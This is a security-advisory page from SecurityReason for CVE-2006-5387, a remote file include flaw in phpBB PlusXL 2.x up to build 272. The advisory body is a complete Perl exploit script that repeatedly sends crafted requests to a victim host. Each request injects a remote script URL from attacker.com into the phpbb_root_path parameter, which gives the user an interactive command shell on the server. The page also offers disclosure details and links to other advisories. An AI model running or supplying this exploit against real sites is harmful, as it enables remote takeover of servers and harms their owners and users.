SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
Search :
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

phpBB PlusXL 2.x <= biuld 272 Remote File Include Vulnerability


Arrow  SecurityAlert : 1740
Arrow  CVE : CVE-2006-5387
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Given : Yes
Arrow  Credit : Ashiyane Corporation
Arrow  Published : 19.10.2006

Arrow  Affected Software : phpBB PlusXL 2.X biuld 272



Arrow  Advisory Text :  

#!/usr/bin/perl

########################################################################
#############################
#
#
# phpBB PlusXL 2.X biuld 272
#
#
#
# Class: Remote File Include Vulnerability
#
#
#
# Patch: unavailable
#
#
#
# Date: 2006/10/12
#
#
#
# Remote: Yes
#
#
#
# Type: high
#
#
#
# Site: http://www.xs4all.nl/~hkicken/plusxl.htm
#
#
#
########################################################################
#############################

use IO::Socket;
use LWP::Simple;

$cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With
Your Personal Script

print "n";
print
"#######################################################################
###n";
print "#
#n";
print "# phpBB PlusXL 2.x <= biuld 272 Remote File Include Vulnerability
#n";
print "# Bug found By : Ashiyane Corporation
#n";
print "# Email: nima salehi nima[at]ashiyane.ir
#n";
print "# Web Site : www.Ashiyane.ir
#n";
print "#
#n";
print
"#######################################################################
###n";

if (@ARGV < 2)
{
print "n Usage: Ashiyane.pl [host] [path] ";
print "n EX : Ashiyane.pl www.victim.com /plusxl20/ nn";
exit;
}

$host=$ARGV[0];
$path=$ARGV[1];
$vul="mods/iai/includes/constants.php?phpbb_root_path="

print "Type Your Commands ( uname -a )n";
print "For Exiit Type ENDn";

print "<Shell> ";$cmd = <STDIN>;

while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host",
PeerPort=>"80") or die "Could not connect to host.nn";

print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1rn";
print $socket "Host: ".$host."rn";
print $socket "Accept: */*rn";
print $socket "Connection: closernn";

while ($raspuns = <$socket>)
{
print $raspuns;
}

print "<Shell> ";
$cmd = <STDIN>;
}




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

Multiple Vendors libc/gdtoa printf(3) Array Overrun

Security Risk High- 2009-05-30

SecurityReason realised new advisory about vulnerabilities libc/gdtoa...

Apache RSS Apache Alert

» Apache Tomcat
   RequestDispatcher
   directory traversal
   vulnerability

» Apache mod_dav / svn
   Remote Denial of Service
   Exploit

» Apache Tomcat Information
   disclosure

» Apache Tomcat User
   enumeration vulnerability
   with FORM authentication

PHP RSS PHP Alert

» PHP 5.2.9 curl safe_mode
   & open_basedir bypass

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

Copyright © SecurityReason.com. All Rights Reserved.